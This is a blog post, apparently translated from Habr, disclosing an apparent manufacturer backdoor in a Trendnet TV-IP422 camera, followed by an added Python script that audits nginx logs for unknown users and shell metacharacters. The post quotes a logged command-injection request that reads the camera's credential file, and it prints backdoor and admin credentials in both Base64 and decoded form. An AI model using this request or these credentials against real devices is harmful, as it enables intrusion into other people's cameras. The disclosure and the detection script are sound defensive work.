
How Trendnet tricked me the 2nd time

The first time was in early 2012. I, the happy owner of a TV-IP422 camera, ran into the problem of anonymous access to the camera, and Trendnet “promptly” released new firmware in which this bug was fixed.

Today I discovered strange camera behavior. I looked at the logs of the nginx that proxies it and was surprised again.
Among a heap of attempts to get into phpmyadmin on the camera, I see the following:

171.25.193.235 - productmaker [26/Mar/2015:02:22:19 +0300] "GET /cgi/maker/ptcmd.cgi?cmd=%3E/dev/null;cat%20usr.ini HTTP/1.1" 200 146 "-" "curl/7.41.0"


This user was never created on the camera.
I try to open this URL without authorization and get a 401.
After logging in, I see the following:
admin = Basic YWRtaW46bXlfc3VwZXJwYXNz
maker = Basic cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl


After some simple manipulations with Base64 we get:

admin = Basic admin:my_superpass
maker = Basic productmaker:ftvsbannedcode


An attempt to log in as productmaker on the camera itself (meaning the administrative part) did not succeed, but the URL shown above can be opened. From this I conclude that this is a “backdoor” deliberately left by the company. Thanks to them for that.
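The log review that surfaced this request can be automated. The following is an added example, not code from the original article: it scans nginx access-log lines for Basic-auth user names the owner never created and for shell metacharacters in URL-decoded query parameters. The `KNOWN_USERS` allowlist, the function name `audit` and the first two sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# nginx "combined" format: addr - user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'(?P<addr>\S+) - (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Assumption: the only account the owner created on the camera.
KNOWN_USERS = {"admin"}
# Characters that let a CGI parameter spill into a shell command line.
SHELL_META = re.compile(r"[;|`$<>&]")


def audit(lines, known_users=KNOWN_USERS):
    """Return [(line_no, [reasons])] for requests worth investigating."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = []
        user, status = m["user"], int(m["status"])
        query = m["target"].partition("?")[2]
        if user != "-" and user not in known_users:
            # The user name is logged even when the password is wrong,
            # so the status code tells a guess from a working login.
            verdict = "accepted" if status < 400 else "rejected"
            reasons.append(f"{verdict} login as unknown user {user!r}")
        # Split on the literal '&' separators first, then decode each part.
        if any(SHELL_META.search(unquote(p)) for p in query.split("&")):
            reasons.append("shell metacharacters in query string")
        if reasons:
            findings.append((no, reasons))
    return findings


SAMPLE = [
    # Constructed: the owner's own session.
    '192.0.2.10 - admin [26/Mar/2015:02:20:01 +0300] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # Constructed: unauthenticated scanner noise.
    '198.51.100.7 - - [26/Mar/2015:02:21:40 +0300] "GET /phpmyadmin/ HTTP/1.1" 401 188 "-" "-"',
    # The request from the article.
    '171.25.193.235 - productmaker [26/Mar/2015:02:22:19 +0300] '
    '"GET /cgi/maker/ptcmd.cgi?cmd=%3E/dev/null;cat%20usr.ini HTTP/1.1" 200 146 "-" "curl/7.41.0"',
]

if __name__ == "__main__":
    for no, reasons in audit(SAMPLE):
        print(no, "; ".join(reasons))
```

Only the third sample line is reported, for both reasons; a 200 response to a user name missing from the allowlist is the signal that a credential outside the owner's control works.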

Everyone will draw their own conclusions from this article, but in my eyes the manufacturer has completely lost face.
Thanks for your attention.


Source: https://habr.com/ru/post/254173/

